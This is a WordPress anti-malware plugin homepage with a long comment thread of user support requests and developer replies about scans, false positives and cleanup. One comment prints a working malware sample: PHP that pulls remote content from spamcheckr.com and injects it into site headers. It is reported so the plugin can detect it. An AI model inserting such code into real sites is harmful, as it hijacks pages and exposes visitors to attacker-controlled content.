Home

This Plugin was created to help WordPress admins clean infections off their site. It was inspired by my own need to clean up one of my BlueHost accounts after a pretty bad hack (see How It All Started). It is still a work in progress and I want to add many new and exciting features. It is currently being offered completely FREE of charge, though it did take quite a lot of time and hard work to develop, test, and make nice.

This project will continue to need my energy to keep it effectively getting rid of new threats and patching new vulnerabilities. That is why I am asking anyone who can, to please make a donation to keep this project going.

Aloha,
Eli Scheetz

Testimonials

  • Thanks for the great work Eli. I am using your plugin in combination with BPS and my site is now malware free since the past two months... I have made a small donation to the best of my capabilities. Will come back and do more...
    -- Don Sony

617 Comments on "Home"

  • On February 6, 2015 at 10:44 am, Will Zell said:

    Suddenly several of my websites that are using the Malware plugin are redirecting to a error page. Example:
    1046673
    You have been redirected here from a site that is protected against brute-force attacks by GOTMLS.NET

    Reply
    • On February 6, 2015 at 1:35 pm, Anti-Malware Admin said:

      There was a major bug in version 4.14.56, I have just released a fix for this issue in version 4.14.58. Please download the new release ASAP and let me know if that fixes it for you.

      Reply
      • On February 7, 2015 at 7:59 pm, Brock Ellis said:

        Thanks so much for staying on top of this, Eli! Your work has saved me many countless hours. I try to donate every time I realize how much you’ve saved my buttocks. =) Thanks again!

        Reply
  • On January 27, 2015 at 3:47 am, Przemyslaw Jarocki said:

    Thank you very much! Your plugin rescued my website and saved me a lot of time by not having to use the backup to restore it. I did few other scans from some ‘pro’ antivirus plugins, but nothing seemed to work, and they ask for a lot of money to go premium with no guarantee that it’s going to solve the problem… With your plugin it’s different, I could test it first. Thank you so much! It was a pleasure to send my donation too.

    Reply
  • On January 4, 2015 at 5:17 pm, John Giovannis said:

    Hi Eli,

    Great plugin ! Very easy to install and the report is easy to interpret. It also found a number of potential threats where other similar plugins weren’t able to detect.

    I was wondering if there a command line version that runs in a bash session ?

    If so, one could create a script which runs periodically and emails the administrator if a problem has been detected.

    All the best …

    Joh

    Reply
    • On January 5, 2015 at 12:29 am, Anti-Malware Admin said:

      Were these potential threats malicious? If so, I would like to take a look at them so I can add them to the Known Threats. If not you can whitelist them.

      There is no command line version but I am working on a scheduling agent as part of my external scan option that will be coming out this year :-)

      Reply
      • On January 5, 2015 at 3:01 pm, John Giovannis said:

        Hi Eli,

        I don’t know for sure if the threats are malicious. I’ll be happy to send you the files so you can have a look.

        I’ve also performed a “diff” between these files and corresponding files from a fresh installation. It’s not obvious which files might be malicious

        Can I send you these files offline directly to your email address ?

        Thanks for checking it out.

        John

        Reply
        • On January 5, 2015 at 3:06 pm, Anti-Malware Admin said:

          Yes, you can send them directly to My email address.

          Reply
          • On February 18, 2015 at 4:19 pm, Parmpatialvis said:

            Sir, i have scanned the websites and got 5 malwares but there is not any option to remove these malwares please tell me what i need to do

          • On February 18, 2015 at 4:36 pm, Anti-Malware Admin said:

            If there is no option to Fix those 5 files then they are probably only Potential Threats not known malware. Only Know Threats and Back-doors in Red can be automatically fixed with my plugin. Potential Threats are probably not malicious anyway.

  • On December 30, 2014 at 10:05 am, Arturo said:

    Hi!

    I tried to download the plugin but it was impossible, apparently this remove to wordpress.org, did something happen?

    Thanks!

    Reply
    • On December 30, 2014 at 7:59 pm, Anti-Malware Admin said:

      Yes, WordPress suspended it today because it was checking my server for updates even if you have not registered (this was against the requirements of the WordPress Repository Guidelines).

      I just released a new version that does not check my servers for updates unless you have registered. They have reviewed my new version and re-listed my plugin. You should be able to download it now.

      Please let me know if you still have a problem with it.

      Reply
  • On December 25, 2014 at 2:22 am, Konrad said:

    Hello,

    I’m trying to scan my page but the only thing that is happening is “Loading, please wait” and nothing more (for few hours). I tried with 2 pages and changed firefox to chrome (cleaned history, temaporaty files). What might be the problem? Plugin is registered and definitions are updated. Thanks for any help! Merry Christmas :)

    Reply
    • On December 25, 2014 at 4:55 pm, Anti-Malware Admin said:

      Did you also try the Quick Scan?

      Chack the Error Console or Page Inspector in your browser to see if there are any JavaScript Errors when you run the scan. This could be preventing the results from being displayed.

      If you want me to troubleshoot this issue you can send your login info directly to my email: eli AT gotmls DOT net

      Mele kalikimaka!

      Reply
  • On December 24, 2014 at 12:37 pm, D. Montgomery said:

    You sir are my hero!

    Your software removed the many compromised scripts that infected my websites. Thank you for being excellent. Sincerely! I am installing this on all of my WP sites from now on.

    Bravo! I wish you the best! Thank you for all you do!
    -Dave

    Reply
  • On December 23, 2014 at 2:41 am, James said:

    Hi, I’ve installed this on a couple of websites I take care of, the one site ran the plugin and updated definitions/registered fine but the other two say “Could not find server!” all of them are hosted on hostgator. Thanks

    Reply
    • On December 23, 2014 at 2:57 am, Anti-Malware Admin said:

      The Definition Updates are checked via JavaScript so if there is another script on your admin page that is causing a JavaScript error it could cause other scripts on that page to fail. See if the Script debugger or inspector in your browser tells you there is a error on the page. Let me know what you find, or if you want to email me your WP Admin login then I’ll check it out myself.

      Reply
      • On December 30, 2014 at 7:00 am, Denise Witt said:

        I am having this same issue, I updated some sites and it updated the definitions/registered just fine and then some of them are saying “Could not find server” and all of them are hosted on HostGator on a dedicated server. Very frustrated and couldn’t find a javascript error that would fix it.

        Reply
        • On December 30, 2014 at 8:00 pm, Anti-Malware Admin said:

          I have fixed this issue in the new version I just released, 4.14.54, please update and let me know if you still have any issues.

          Reply
  • On December 18, 2014 at 1:36 am, Petrescu Cezar said:

    Thank you! You saved my work. Donated aswel.

    Reply
  • On December 6, 2014 at 3:04 am, Jack said:

    Hi, i want to test your plugin as all php files have code added at top, does it solve the problem mentioned here

    http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html

    Reply
    • On December 6, 2014 at 3:10 am, Anti-Malware Admin said:

      My plugin should fix the malware issue you have. Please go ahead and test it and let me know how it goes.

      Reply
  • On September 11, 2014 at 6:29 pm, Helen said:

    Hi guys. i have a site that when i look in google has thousands of pages attached to the domain so looks like mydomainname.com/playstation-wont-game-updates-a6c56 and when i click on the link it goes to my site but to the home page and says content not found

    I ran the software but it says nothing wrong and has identified some files that all look legit?? in the Potential Threats

    * NOTE: These are probably not malicious scripts (but it’s a good place to start looking IF your site is infected and no Known Threats were found).
    They are to do with plugins etc

    My question is how do i fix this and get these links out of the google seach engine please

    Reply
    • On September 12, 2014 at 8:14 am, Anti-Malware Admin said:

      If you have registered my plugin and downloaded the latest Definition Update then I wouldn’t worry about those Potential Threats. I am working on a new release that will make it easier to whitelist those legit plugins that use suspicious code. As long there are no more Known Threat (in red) then your site is probalby clean.

      Google must have indexed your site when it was infected with malware and added links to all those fake pages. The fact that those pages don’t come up on your site any more is further evidence that your site is now clean. To get these links off of Google’s search results you’ll need a Google Webmaster Tools account (signup now if you don’t already have an account). You can submit a Sitemap under “Crawl” the tell Google what pages you wouldlike to be indexed. You can also Remove URLs under “Google Index” so that those 404 links get dropped from the search results.

      Please let me know if you need any further assistance.

      Reply
  • On September 7, 2014 at 2:16 am, Lamb Farm said:

    Hi Eli.

    After what seems like years (but only days) of trying to recover from malicious malware and SEO spam, I discovered your plugin which ‘seems’ to have fixed most of my websites.
    Except one. When I run the full scan and attempt to fix some errors, it tells me that it could fix x number but not the rest. Then I run again and it fixes more. I have several thousand lines to fix so this might take me many weeks at this rate.

    Am I doing something wrong?

    BTW, I’m SO impressed with your plugin so far on the other sites, it was like magic!
    Lamb

    Reply
    • On September 7, 2014 at 8:13 am, Anti-Malware Admin said:

      I just had another user with the same problem. They had over four thousand infected file but couldonly clean about 100 at a time. This is due to a PHP memory limit on your server. My plugin will fix them all in one pass if it can but if the process runs out of memory then it will stop and report however many it was able to fix on that pass. Then you just have to click the fix button again and it will keep on going through your list of Know Threats where it left off on the last attemp. It took a couple hours to get through a few thousand infected files on this other server but there really isn’t another way to do it. The only thing that might speed things up is if you can increase the memory limit in your PHP config.

      Reply
      • On September 7, 2014 at 6:19 pm, Lamb Farm said:

        Thank you Eli.

        Even after I tried to fix the errors, it hangs for a long time and I get this error:

        Request Entity Too Large
        The requested resource
        /wp-admin/admin.php
        does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.

        So after a day of scanning, not sure how i’m going to be able to run and fix in segments after all. Any suggestions?

        Thanks
        Lamb

        Reply
        • On September 7, 2014 at 7:01 pm, Anti-Malware Admin said:

          It sounds like there are lots of limits in your php.ini file that are way too low. You can try increasing the POST sizi limit. You might even consider switching hosting to a better server. How many sites do you have?

          If you want to stick it out the key is to fix a few at a time. If you start the Complete Scan over you should click the fix button when ever new threats are found. You can click and clean as it scans or you can pause and clean and then resume, but the key is to click the fix button often enough that it does not get overwhelmed. How long does a Complete Scan take to finish? If you keep fixing as the scan goes on then you should be all done when the scan is done.

          Let me know if you need more help. You can also send me your WP Admin login if you want me to take a look at it personnally.

          Reply
  • On August 12, 2014 at 5:16 pm, Jake said:

    I didn’t see an area to report malicious scripts, but you might consider including spamcheckr.com as a malicious term to scan for. I found your plugin while trying to resolve this issue:

    http://stackoverflow.com/questions/22923521/wordpress-blog-infected-with-html-refresh-meta-tag

    This ended up being the malicious code:

    if (mt_rand(0,99) == 1) {
    function sec_check() {
    if(function_exists(‘curl_init’))
    {
    $url = “spamcheckr.com/req.php”;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    }
    add_action(‘wp_head’,'sec_check’);

    Reply
    • On August 13, 2014 at 12:29 pm, Anti-Malware Admin said:

      Thanks for reporting this new variant. I have added it to my latest Definition Update so that it can be automatically removed in future scans.

      You should download the latest Definition Update and run a Complete Scan to see if it is found anywhere else on your site.

      Please let me know if I can be of any further help or if you find any more malicious code on your site that I should look at.

      Reply
  • On August 3, 2014 at 10:29 am, omar masrur said:

    Hi Eli
    I have a wordpress website. Google reported i have malware, indicated the wordpress page and the infecting links. The links are:

    http://cdn1.clkmon.com/script/rhpop_1.0.23.js
    http://clkmon.com/adServe/banners?tid=J1J2J3_15614_0&tagid=2&_=1407065858845

    Funnily enough, Google webmaster does not indicate a problem though.

    I just downloaded and ran GOTMLS on WP-content and did not find a threat. The 17 potential threats do not have the page google mentioned.

    Any thoughts on how to proceed next? My google ads are not running now for 4 days and its killing my small business!!!!

    tks

    Reply
    • On August 3, 2014 at 10:42 am, Anti-Malware Admin said:

      Make sure you have registered my plugin so you can download the latest Definition Updates. Then run the Complete Scan on the whole site (not just the wp-content) and fix any Known Threats that it finds.

      It is still does not find anything please let me know.

      Reply
  • On August 2, 2014 at 12:48 am, Guido Osterwald said:

    Superb plugin and fine piece of works, which helpedc me to get my site clean again, after some more or less minor or major attacks!
    Just a quest … i donated (of course!!!) … but having done that, your plugin tells me i hadnt …. could you please check and tell me?

    Reply
    • On August 2, 2014 at 1:31 am, Anti-Malware Admin said:

      Thank you, I see your donation, it just didn’t get associated with your Registration Key. I have corrected this so that you donation should now be reflected in your WP Admin.

      Reply
  • On July 28, 2014 at 9:25 pm, Seyyah Çelebi said:

    Hi my friend, i am writing from Turkiye, my all sites hacked 7 months ago, and then my host suspended all my sites several times, i deleted all infected files, but i couldnt prevent.But one day i thought is there any plugin for malware, so i found your plugin and used.This is awsome, it protects me malwares, and i passed all virus check or security check sites, my site is clean, i am very appreciate.I will write an article in my native language, and i will say everybody to use this plugin.Thank you my friend, you saved my labors.Thank you very much, if one day you wanna come Turkiye, pls send me message…

    Reply
  • On May 18, 2014 at 1:12 am, Graham said:

    Hi Eli,
    Been using your plugin on my sites for some time now, and have donated in the past. All my sites with Bluehost are currently down. I’ve been told it’s likely to be malware. Is there any way of using your plugin through cPanel as I don’t have access to wp-admin?

    Reply
    • On May 18, 2014 at 6:17 am, Anti-Malware Admin said:

      Unfortunately you will need at least one site on the server to have a working WP Admin so you can run my plugin. If you can get your main site working I can get my plugin to scan all the site at once. If you need help getting a site working you can email me directly with your cPanel login and I’ll see what I can do.

      Reply
  • On April 7, 2014 at 8:12 am, Bastien said:

    Great plugin which help me to save a lot of time ! Cheers from France.

    Reply
  • On March 5, 2014 at 7:07 pm, Ian R. Wilson said:

    Fantastic plug-in! Spent hours trying to track down the malware on my customers site. stumbled across this tool. BAMB!!! All taken care of. Will donate soon! Thank you!!!!!

    Reply
  • On February 2, 2014 at 12:59 pm, Piotr Wilkin said:

    Thought you might want to know – on a virtual server that I ran the plugin on it had problems scanning the root directory – probably due to an empty path after splitting on __file__. Adding

    if (empty($dir)) $dir = “/”;

    after line 583 fixed the problem for me.

    Reply
    • On February 3, 2014 at 1:59 am, Anti-Malware Admin said:

      Thanks for this bug report!

      I can see how your addition would quiet the error you were getting but I am more concerned with the circumstances that produce an empty $dir array. I don’t see how you could have my plugin installed in a lower directory the WordPress itself (even on a virtual server). How does __FILE__ resolve to a path that is less than 3 directories deep?

      I would love to gain a more thorough understanding of what factors produce this result on your server so that I can release a plugin update that comprehensively addresses this issue. Would you be willing to grant me WP Admin access to your site so that I can debug this issue first-hand?

      Please get back to me either way to let me know if you are willing to assist any further with this issue. Thanks :-)

      Reply
  • On January 21, 2014 at 9:32 am, Mike H said:

    This plugin is amazing and you have my thanks for creating it!

    I’ve done a couple of scans successfully, but ran into one issue. A quick scan keeps occurring when viewing the scan section. It keeps automatically scanning, therefore preventing me from doing a full scan. Not sure why. I even uninstalled it + reinstalled it to see if I could get it to stop, but it’s permanently scanning and failing (reports that it can’t complete because of lack of memory).

    Reply
    • On January 22, 2014 at 6:03 am, Anti-Malware Admin said:

      The Quick Scan is meant to run automatically when you choose it off the menu directly, but it’s only good for small selections of files on a server that has enough memory for a single PHP process to scan them all. If you want to run the Complete Scan you can do that from the Scan Settings page. There you can adjust all the scan settings and then choose which type of scan to run (Quick or Complete).

      If you still have trouble just let me how I can help.

      Reply
  • On January 16, 2014 at 5:32 am, Joy said:

    Hi Eli:

    I am coming across a bug in one of my sites (in the header) that is not being caught via a scan:

    <?php
    #b8da75#
    if(empty($gcsf)) {
    $gcsf = "”;
    echo $gcsf;
    }

    #/b8da75#
    ?>

    Thought you would like to know.

    Aloha, Joy

    Reply
    • On January 16, 2014 at 7:31 am, Anti-Malware Admin said:

      The code you have here innocuous and will have no impact on your sites performance or security. I was likely part of a bug that my plugin removed and you should be able to remove without adverse side-effects but it’s not necessary.

      Reply
  • On January 9, 2014 at 2:51 pm, chris jones said:

    I cannot say how thankful I am to Eli and his plugin. Simply the best support I have ever received from any company. I posted a support question and he literally emailed me in 30 mins and helped me through the issue. Amazing !! We cleaned 2 entire sites with Malware and saved me a ton of $.

    I have since then implemented the plugin on a number of my sites.

    Reply
  • On December 30, 2013 at 3:09 am, Flashpoint Miniatures said:

    Howdy , this is a great tool !

    I am having trouble with a trojan (Trojan.JS.Iframe) in the footer of my wordpress site/blog. I have the updated version of your program and have run the complete scan for wp-content AND for plugins , and am not finding the file being flagged that I think I should be finding. (ie; a woothemes file)

    I have also been running wordfence scans which give the all-clear.
    Sucuri is also giving me the all clear .

    ….. but http://support.clean-mx.de/clean-mx/viruses.php?response=alive&email=abuse@ozservers.com.au&limit=195
    ….still identifies the trojan as active.

    what to do next ?

    Thankyou in advance.
    Jimmi

    Reply
    • On December 30, 2013 at 3:33 am, Anti-Malware Admin said:

      It looks to me like your site is clean. Did you remove the iframe?

      I think that clean-mx site is checking email viruses that may still be circulating but not active on your site. Is there anything to indicate that your site is still showing these iframes?

      If you have reason to believe you still have an active malicious iframe embeded on your site then you can send me your WP Admin login and a will take a look at it for you.

      Aloha, Eli

      Reply
  • On December 2, 2013 at 9:29 pm, Will Chapman said:

    Eli

    I just upgraded to the latest version and on starting a complete scan I get the following:

    Fatal error: Allowed memory size of 67108864 bytes exhausted (tried to allocate 524829 bytes) in /home/waterway/public_html/wp-content/plugins/gotmls/images/index.php on line 393

    CHeers

    Will

    Reply
    • On December 3, 2013 at 10:25 am, Anti-Malware Admin said:

      Hey, thanks for sending me your login credentials.

      The problem here is that you have a php.ini file in your wp-admin directory with the memory_limit directive set to “64M”. I tried overriding this setting with the ini_set function in PHP and by using “php_value memory_limit 256M” in your .htaccess file but neither method will work on your server. I cannot change the php.ini file directly because it is owned by “root”, but maybe you can gain write access to this file and raise the memory_limit directive to “256M”?

      Let me know if there is anything else I can do.

      Reply
  • On October 6, 2013 at 12:46 am, Pete Lauder said:

    Hi Eli, I have been trying to login to my site for a few weeks now, and keep getting a loop on entry, leaving an error, although logged in, all dashboard access is denied.

    The site is up, and after attempting to access the dashboard, the live site shows the admin bar.

    I have noticed that one of my GOTMLS quarantined files is a php file that is full of login commands, and wonder if this has any bearing on my problem.

    I do not know how to manually restore the file, so perhaps you could take a look for me.

    On a side note, have you any plans to release a standalone version for html sites?

    Reply
    • On October 6, 2013 at 1:18 am, Anti-Malware Admin said:

      First, what is the error left by the looping when you try to login?

      Second, I am right in assuming that, after this attempt to login that will show the admin bar on the live site, that you can use the admin bar to access the dashboard successfully?

      Third, I’m not sure I understand what you mean by “a php file full of login commands” in the quarantine. can you send me this PHP file so I give you a better answer on that?

      If you want me to take a look at this you can send me a WP Admin login to your site and I’ll login later today to check it out.

      As for that side note, I do plan to write a wrapper for my plugin that would enable it to run without a WordPress install.

      Reply
      • On October 6, 2013 at 3:46 am, Pete Lauder said:

        The error on chrome is; Error code: ERR_TOO_MANY_REDIRECTS

        Secondly, no, although the admin bar is there, attempting to enter the dashboard results in a 404 error.

        I’m sending you the login, and the ftp access to take a look at the file, I’m no php coder, but the page does seem centered around logging in to WP, and may be from one of my security plugins.

        And that is really great news about writing the wrapper for the plugin, it is much needed.

        Reply
        • On October 6, 2013 at 9:02 pm, Anti-Malware Admin said:

          Thanks for getting me the FTP login info. I was able to figure out what was blocking you from your wp-admin pages. It wasn’t my plugin, or even any of the other plugins that was interfering with the wp-admin folder. There was actually a custom php.ini file in the wp-admin directory that was using directives like ‘magic_quotes_gpc’ and ‘allow_call_time_pass_reference’ which are no longer supported in the version of PHP you now have on your server. I just rem’d out those two lines and your wp-admin folder became accessible again.

          Let me know if there is anything else I can do for you. It would also be great to get a big fat donation from you for all that work ;-) and that would help me get to work on improvements for my plugin (like that non-WP wrapper you need).

          Reply
          • On October 7, 2013 at 6:26 am, Pete said:

            Thats my second donation in as many day’s, Eli is such a gent, as you can see, he fixed my site when it was unrelated to GOTMLS.

            You really can’t beat that!

            I must now review the plugin on my plugin site, and see how to squeeze an extra star in for service.

            Thanks Eli

  • On October 4, 2013 at 4:43 pm, Will Chapman said:

    Eli

    I have run a scan and everything is clean except for a notation in the scan report that there were 15 read/write errors. What is the significance of this?

    Regards

    Will

    Reply
    • On October 6, 2013 at 1:00 am, Anti-Malware Admin said:

      Read/Write errors can be caused by abnormal file permission, zero byte file size, or files that are too big to match in a regular expression. It’s hard to say, without seeing the files, if they are a threat to you. Hackers are known to make their files non-readable so as to escape detection but there are always lots of benign reason for read errors too. You should first try to download the files via FTP and look at the file contents with a text editor to see if you can tell if they are safe. You can also use any good FTP client to check that the file permission right. Feel free to send me any files you are not sure of.

      Reply
  • On September 29, 2013 at 9:27 pm, John said:

    Your software is no longer showing up on my wp….I try to reinstall and it fails because it says it’s already there…any suggestions?

    Reply
  • On August 13, 2013 at 10:33 am, Dr. Shefali Dandekar said:

    my website does not contain any malware buy google chrome / firefox always shows warning :(

    Reply
    • On August 13, 2013 at 11:04 am, Anti-Malware Admin said:

      I don’t see any malware on there either but I see the warnings from Google. Do you have a Webmaster Tools account with Google? You should check for specific malware warnings in the health section of your Google Webmaster Tools account.

      Reply
      • On August 13, 2013 at 9:50 pm, Dr. Shefali Dandekar said:

        yes i already send review my website request to google

        Reply
        • On August 14, 2013 at 5:19 am, Anti-Malware Admin said:

          To request a review is a good way to resolve this but if there are still “infected” URLs on your site Google will not lift the warnings. On that same Malware page in the Health section of your Webmaster Tools there should be a list of URLs on your site that Google found to contain malware and when it was detected. This may indicate that you have a conditional redirect or some malicious links that only show themselves to the search engine. If this is the case, and my plugin has not found this threat on your site, then you can give me your WP Admin login and I will track down the source of this infection for you.

          You can email login info directly to me: eli AT gotmls DOT net

          Reply
  • On August 9, 2013 at 5:01 am, Dejo said:

    I ran the scan and it found a few items which it quarantined. But when I add my web address in a Facebook post, I see spam in the description so there must be something still wrong. Can you check it out? There are a few potential threats also. Thanks!

    Reply
    • On September 19, 2013 at 9:52 pm, Anti-Malware Admin said:

      First let me say that I am really sorry fro not replying sooner. I completely missed the notification of your post.

      I am guessing that this was a cache issue and it just took a little while for the facebook post to refresh with your cleaned up content. If you are still having any issue though please contact me directly and I’ll see what I can do.

      Reply
  • On August 2, 2013 at 1:15 pm, Rosie said:

    Eli,
    I love your plugin. I’ve used it on another of sites. However, when I tried running it on this website, it does not run. Also, when I click on Eli’s Blog
    Anti-Malware, AVG blocks it and it says it found a virus JS/Phish. Do you have any suggestions on why it won’t run?

    Reply
    • On August 3, 2013 at 3:05 pm, Anti-Malware Admin said:

      It sounds like your site is infected and maybe it is embedding infections in the links too.

      I would be happy to check it out for you if you want to send me your WP Admin login.

      You can email you password directly to me if you want: eli AT gotmls DOT net

      Reply
  • On July 20, 2013 at 8:54 am, Evan Huang said:

    Hi, how does the “Plugin Updates for WP 3.5.2″ section in the top right corner of AM settings differ from normal wordpress plugin updating?

    The one on the settings screen just seems to keep searching for no reason, and I just installed this plugin today.

    Reply
    • On July 20, 2013 at 10:02 am, Anti-Malware Admin said:

      The Plugin Update section on the Anti-Malware Settings page checks the changelog on my site for updates. It displays the changes in those updates if any are available so you can see what’s in the next release. It displays this information independent of the WP repository or the WP Cron job that is supposed to let you know when any plugin updates are available.

      Reply
  • On June 23, 2013 at 8:24 am, Gokhan Ayyildiz said:

    Thanks

    Reply
  • On June 21, 2013 at 6:29 pm, Anti-Malware Admin said:

    You’re welcome!

    What is not clear? Do you still have malicious code on your site?
    If you want to send me your WP Admin credentials for your site, you can email the login directly to: eli at gotmls dot net

    Sorry, I don’t speak Russian :(

    Reply
  • On May 29, 2013 at 3:07 pm, Will Chapman said:

    Eli

    I’ve been seeing examples of malware on all sorts of sites (even on big sites) that puts a doube-line under some words thus inbiting one to click (you can see examples on the front page of http://alrewascanalfestival.org) when one clicks you get taken to an innocuous-looking website that runs an ad or survey – clicking through may be a point of infection?

    Anyway looking at the code on my webpage it has been hacked to read apprenticeship. Is this one that GoMLS can repair?

    Regards

    Will

    Reply
    • On May 29, 2013 at 3:35 pm, Anti-Malware Admin said:

      You are seeing these link on various websites because your browser is infected not the sites themselves. If I look at the same sites I don’t see the infection but you will see these malicious site even on sites that are clean. It is an Add-On/Extension that is installed into your browser that is embedding these link that you see.

      Try running Malwarebytes or a good anti-virus on your computer. You could also try uninstalling the adware from the Programs in the Control Panel if you know what to look for.

      Reply
  • On May 25, 2013 at 6:37 am, Will Chapman said:

    Dear Eli

    I continue to be very impressed with your plugin and I thought the following minor cosmetic observations might be helpful:

    1. This doesn’t always happen but sometimes the start of a full scan 609 folders were found – about 60% through the scan, that increased to 899 folders. At the end of the scan 893 folders had been selected and 899 scanned.

    2. Normally the original estimated time to complete the scan was several given as 1-2 hours. As the scan proceeded, this changed to about an hour. On one recent occasion midway through the scan time elapsed changed to 22824335 minutes and time remaing to 17700505 minutes. As the scan proceeded, I noticed that only the last two digits of time scanned were changing at appeared to be the accurate number of minutes whereas time remaining had no apparent pattern and changed wildly.
    At the completion (100%) of the scan time taken was 22824357 minutes versus an actual 57 minutes. Time remaining was -9139898 seconds and -6 folders remained.
    3. The list of possible infections seemed to be concentrated in wp-content (plugins and themes] and I wondered whether only active plugins and the current theme were scanned [to save time] and, as such whether it was worthwhile to delete inactive plugins (and themes).
    The other folder taking up a lot of time was wp-include and as most (if not all) of this WP core code would it be safe for us to exclude wp-include as a target for scanning?
    4. Another plugin I use – not as good as yours! – flags a couple of WP core files as not matching the current WP version and when I check them I notice that they contain GoMLS code. Would it be practical to place this code in a non-core file like theme/functions.php (which I understand can be used for bits of code that won’t be overwritten by theme & WP updates)?
    5. I have 6 websites all running from subfolders of a main domain. This creates a problem when I want to scan the main domain (waterwaywatch.org) because GoMLS offers three radio button options I have the choice of public_html (all subdomains which is tempting because it would check all domains but takes several hours) or wp-content (plugins & themes but not wp-admin or wp-includes?) or plugins (not much different to wp-content?) – could we have a multi-choice option of wp-admin, wp-content and wp-include?

    Best regards

    Will

    Reply
    • On May 26, 2013 at 9:12 pm, Anti-Malware Admin said:

      These are all great points. I will give you a reply to each numbered accordingly:
      1. This happens sometimes because of errors during the scan where folders were not read on the fist attempt are re-scanned, thereby increasing the overall scanned folders count. Some folders that are skipped or could not be read will sometimes throw off the total count.
      2. I have only seen this happen when a second scan is started before the first scan finishes, throwing off the start time and thus the calculated time to completion. This could also be due to a system time update during the scan process.
      3. Potential threats are a real gray area. I am working on improving the white-list, which will take care of most of these. It is extremely important to scan all files, not only active plugins and the current theme, because the threats are sometimes included or linked elsewhere and are therefore still active even if the plugin is deactivated. However it would be worthwhile to delete inactive plugins and themes, and un-needed backups (and any other un-necesary files) to save time when scanning. It is also just as important to scan wp-include and all WP core files because it is very common for these files to be infected. Therefore it would not be safe to exclude any directory from the scan.
      4. If it is the wp-login.php file that is flagged as not matching the current WP version then yes, it should contain GOTMLS code. It would not be practical to place this code in any other file because it has to load before the WP bootstrap to prevent DOS for brute-force attacks on the login page.
      5. As well as the three radio button options you also do have the multi-choice option of scanning only the wp-admin, wp-content and wp-include under public_html. Just click the linked “public_html” and select only the folder you want to scan.

      I hope this helps. Please feel free to write me back with any more questions.

      Reply
  • On May 24, 2013 at 7:52 am, Jeff Rafael said:

    Hello,

    I’m using the latest definitions, I run quick scan it goes to about 61% and stops. It says there are 2 backdoor scripts. I run fix, it says its cleaned but it doesn’t remove them when i scan again, nor does it quarantine them. I also run a complete scan and it gets stuck at 99%, tries to re-scan but nothing happens. Below are the scripts it finds over and over again and does not remove them. Please help! Thank you.

    /home/biotcoup/public_html/wp-content/cache/object/000000/3ca/c4f/3cac4fcbc57b63046e84988bf6ccfede.php
    /home/biotcoup/public_html/wp-content/cache/object/000000/5de/1b3/5de1b35463eb632e87a806c4d9def5bb.php

    Reply
    • On May 24, 2013 at 9:52 am, Anti-Malware Admin said:

      Thanks for give me the login to your site. It looks like it actually is cleaning those files and putting them in the Quarantine. But because those are cache files, they are just being re-written by the w3-total-cache plugin. The folder it keeps getting stock in is /public_html/wp-content/cache/object/000000/b14, which is the directory that w3-total-cache is writing all the files to.

      I would strongly advise disabling all caching and deleting any stored cache files (at least while you try to scan and clean up your site). Caching is a direct hindrance to removing malware because the cache can preserve the malicious content even after the threat has been removed. You also need to look at changing your .htaccess file to completely disable caching.

      Please let me know if I can be of any further assistance.

      Reply
  • On May 22, 2013 at 7:53 pm, namor said:

    dear eli

    i get a exploit message with a freshly from wordpress uploaded wp-login.php. is this possible. what can i do?

    Found 1 WP-Login Exploit…

    greatings, namor

    Reply
    • On May 22, 2013 at 8:08 pm, Anti-Malware Admin said:

      I have received other inquiries as to why the wp-login.php file is flagged as a WP Login Exploit on every install of WordPress, even brand new installs of the most current version. This is simply because WordPress has no built-in brute-force protection and the login page is exploitable. It has been clearly demonstrated through the recent widespread attacks on WordPress login pages around the world that it is not only vulnerable to password cracks via brute-force but it has been shown to overload and bring down a whole server if the attacks are too numerous. That is why my patch prevents the loading of the WordPress bootstrap if a brute-force attack is detected so that your server’s resources are not tied up telling hackers if they guessed the right password or not.

      So basically, if my plugin finds that the first line of code in the wp-login.php file is loading the wp-load.php file without my protection before it then it flags it as a vulnerability. Applying my patch before this first line of code filters out this plague of attack so that they don’t even load WordPress and your server is free to serve the pages that your legitimate visitors are requesting.

      I hope this helps answer your questions about this new threat and my approach to solving it.

      Reply
  • On May 17, 2013 at 9:10 am, Damir Kropf said:

    I’m receiving alerts from Norton: “Web Attack: Mass Injection Website 5″

    I run complete Anti Malware (ver. 1.3.05.14) scan on my site and it didn’t find anything?

    Regards,
    Damir

    Reply
    • On May 17, 2013 at 10:20 am, Anti-Malware Admin said:

      This is a new threat that has not been added to my Definition Update yet. I can see the malicious iframes in the footer of your site. If you can send me the footer.php file from your theme then I will add this threat to my Definition Update so that it can be removed automatically.

      Reply
  • On May 15, 2013 at 3:40 pm, Rolando G said:

    Eli I have been dealing with malware for the last 2 weeks I have been flagged by google and now found your plugin! I have begun to scan and i ve found threats can you personally take a look at it! I will be more than happy to make a donation..I have 2 sites I think they have the same malware!!! THANKS

    Reply
    • On May 15, 2013 at 4:45 pm, Anti-Malware Admin said:

      Send me your WP Admin login and I’ll take a look.

      Reply
      • On May 16, 2013 at 8:52 am, Rolando G said:

        hello Eli any updates on my websites..Thanks and have a great day!

        Reply
        • On May 16, 2013 at 9:18 am, Anti-Malware Admin said:

          Sorry for the delay, it took a long time to scan one of the sites. I had to reset some of the scan setting and start the scan over, but both sites are clean and it looks like they are not even blacklisted any more (Google must have updated their cache already).

          Reply
  • On May 13, 2013 at 10:27 pm, Okoro David Osato said:

    hi, i just want to say thanks a lot to you guys. the slideshow at the top of this website gave me the tips i needed and i found the fr**king malware on my client’s website and deleted it. will download the plugin all the same and install it for (hopefully not) future use.

    Os@o.

    Reply
    • On May 14, 2013 at 11:35 am, Anti-Malware Admin said:

      When you install the plugin you should register it, download the current Definition Update, and run a Complete Scan to make sure there are no other threats, back-doors, or other vulnerabilities (and you should patch the wp-login.php file to protect against brute-force attacks).

      Reply
  • On May 3, 2013 at 3:00 pm, Elizabeth said:

    Hi,
    My client’s website seems to have been hacked. I have run the plugin, but I am not sure if I am doing it right as the malware seems to still be there. Please advise and I will donate money for your time and effort in a few. Thanks!

    Reply
    • On May 3, 2013 at 3:31 pm, Anti-Malware Admin said:

      I see there is an iframe still in the header. If you want to give me you WP Admin login I will remove that for you and add it to me definition updates.

      Reply
